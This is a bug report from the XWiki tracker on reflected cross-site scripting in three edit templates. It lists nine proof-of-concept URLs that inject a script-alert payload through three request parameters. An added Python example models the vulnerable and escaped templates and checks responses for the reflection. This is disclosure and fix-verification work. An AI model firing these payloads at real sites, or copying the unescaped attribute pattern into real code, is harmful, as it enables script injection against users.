XWiki Platform
XWIKI-5243

Reflected XSS in edit(wiki|wysiwyg|wysiwygnew).vm


Details

    • security, xss, patch
    • Integration
    • Trivial

    Description

      Exactly the same mistake in all 3 templates. Injection via "section", "template" and "xredirect", for example:

      http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwiki&section=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwiki&template=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwiki&xredirect=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      
      http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwysiwygnew&section=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwysiwygnew&template=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwysiwygnew&xredirect=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      
      http://localhost:8080/xwiki/bin/view/Main/Test2?xpage=editwysiwyg&section=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      http://localhost:8080/xwiki/bin/view/Main/Test2?xpage=editwysiwyg&template=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      http://localhost:8080/xwiki/bin/view/Main/Test2?xpage=editwysiwyg&xredirect=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      
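The pattern behind all nine URLs above, as an added example that is not part of this report or of XWiki's own template code: a model of a request value dropped unescaped into a quoted attribute (the Velocity equivalent of `value="$request.section"`; the exact template markup is an assumption, the report does not show it), the hardened form with the value escaped (the role `$escapetool.xml()` plays in a Velocity template), a generator for the same nine probe URLs, and an offline check that tells an unescaped reflection from an escaped one by parsing the response the way a browser tokenizer would.

```python
"""Model of the attribute-context reflection reported above (illustrative, not
XWiki's own template code) with a hardened variant and an offline check."""
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

TEMPLATES = ("editwiki", "editwysiwyg", "editwysiwygnew")  # the three xpage values
PARAMS = ("section", "template", "xredirect")              # the three injected parameters
PAYLOAD = '"><script>alert(1)</script>'                     # decoded form of the report's URLs


def vulnerable_render(request):
    """Assumed shape of the flawed template: each request value is written
    straight into a quoted attribute, i.e. value="$request.section" in Velocity."""
    return "".join(
        f'<input type="hidden" name="{name}" value="{request.get(name, "")}" />\n'
        for name in PARAMS
    )


def hardened_render(request):
    """Same markup, but every value goes through an HTML attribute escaper
    (the role $escapetool.xml(...) plays in an XWiki Velocity template).
    quote=True matters: the report's payload opens with a double quote."""
    return "".join(
        f'<input type="hidden" name="{name}" '
        f'value="{html.escape(request.get(name, ""), quote=True)}" />\n'
        for name in PARAMS
    )


def probe_urls(base="http://localhost:8080/xwiki/bin/view/Main/Test", payload=PAYLOAD):
    """Rebuild the report's nine URLs; urlencode yields the %22%3E%3Cscript... form."""
    return [f"{base}?{urlencode({'xpage': xpage, name: payload})}"
            for xpage in TEMPLATES for name in PARAMS]


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags the way a browser's tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def script_elements(body):
    """Number of real <script> elements in the response body. A payload that stays
    inside an attribute value, or is escaped as &lt;script&gt;, counts 0."""
    parser = _ScriptCounter()
    parser.feed(body)
    parser.close()
    return parser.scripts


def reflected_unescaped(body, payload=PAYLOAD):
    """True when the raw payload survives in the body and yields a script element,
    i.e. the leading double quote closed the attribute and the rest became markup."""
    return payload in body and script_elements(body) > 0


if __name__ == "__main__":
    for url in probe_urls():
        print(url)
    tainted = {"section": PAYLOAD}
    print("vulnerable:", reflected_unescaped(vulnerable_render(tainted)))  # True
    print("hardened:  ", reflected_unescaped(hardened_render(tainted)))    # False
```

Checking for the raw payload string alone is not enough when verifying a fix: a server can reflect the text unchanged in a context where it is inert, or strip only `<script>` while leaving the attribute break-out intact, so the check also parses the body and counts actual script elements. Against a live instance the same `reflected_unescaped` can be run on the fetched body of each URL from `probe_urls()`.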


            People

              nickless Alex Busenius
              nickless Alex Busenius